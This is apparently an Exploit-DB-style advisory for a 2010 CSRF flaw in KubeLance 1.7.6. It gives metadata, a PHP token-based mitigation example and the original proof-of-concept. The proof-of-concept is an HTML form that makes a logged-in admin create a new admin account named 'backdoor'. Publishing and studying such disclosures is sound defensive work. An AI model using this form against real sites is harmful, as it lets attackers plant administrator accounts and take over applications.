Vendor: KubeLance
By: Milos Zivanovic
CVSS: 8,8 (HIGH)
Title: Cross Site Request Forgery (Add Admin Exploit)
CWE: 352
Product Name: KubeLance
Affected Version From: 1.7.6
Affected Version To: 1.7.6
Patch Exists: NO
Related CWE: N/A
CPE: a:kubelabs:kubelance:1.7.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2010

KubeLance 1.7.6 (Add Admin) CSRF Vulnerability

The KubeLance script lacks cross-site request forgery protection, which makes it possible to build an exploit that adds a new admin user.

Mitigation:

Implementing proper CSRF protection.
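
One way to implement this mitigation for a state-changing admin form is a per-session synchronizer token. This is an added example, not KubeLance source code: the function names and the `csrf_token` field are assumptions, and only the `username`, `password` and `submit` field names are taken from the form in the advisory.

```php
<?php
// Added example: synchronizer-token CSRF check for an "add admin" form.
// Not KubeLance code; csrf_token(), csrf_token_valid() and the csrf_token
// field name are hypothetical. Assumes the admin area uses PHP sessions.

session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Strict', // cookie is withheld on cross-site requests (PHP >= 7.3)
]);
session_start();

/** Return the per-session token, generating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** True only when the submitted value matches the token stored in the session. */
function csrf_token_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted)
        && $expected !== ''
        && hash_equals($expected, $submitted); // constant-time comparison
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_token_valid($_POST['csrf_token'] ?? null)) {
        // A form hosted on another origin cannot read the token, so it ends here.
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Token verified: the application's existing admin-session check and
    // add-admin logic would run here (not shown on the page).
    exit('Request accepted');
}
?>
<form action="" method="post">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" name="submit">
</form>
```

The same check belongs on every other state-changing admin endpoint, since the token only protects handlers that verify it.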

Exploit-DB raw data:

[#-----------------------------------------------------------------------------------------------#]
[#] Title: KubeLance 1.7.6 (Add Admin) CSRF Vulnerability
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail[dot]com
[#] Date: 02. February 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: KubeLance
[#] Version: 1.7.6
[#] Platform: PHP
[#] Link: http://www.kubelabs.com/kubelance/
[#] Price: 90 $
[#] Vulnerability: Cross Site Request Forgery (Add Admin Exploit)
[#-----------------------------------------------------------------------------------------------#]

KubeLance script lacks cross site request forgery protection, allowing us to make an exploit and add a new admin user.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/kubelance/adm/admin_add.php" method="post">
<input type="hidden" name="username" value="backdoor">
<input type="hidden" name="password" value="another-admin-added">
<input type="submit" name="submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#]EOF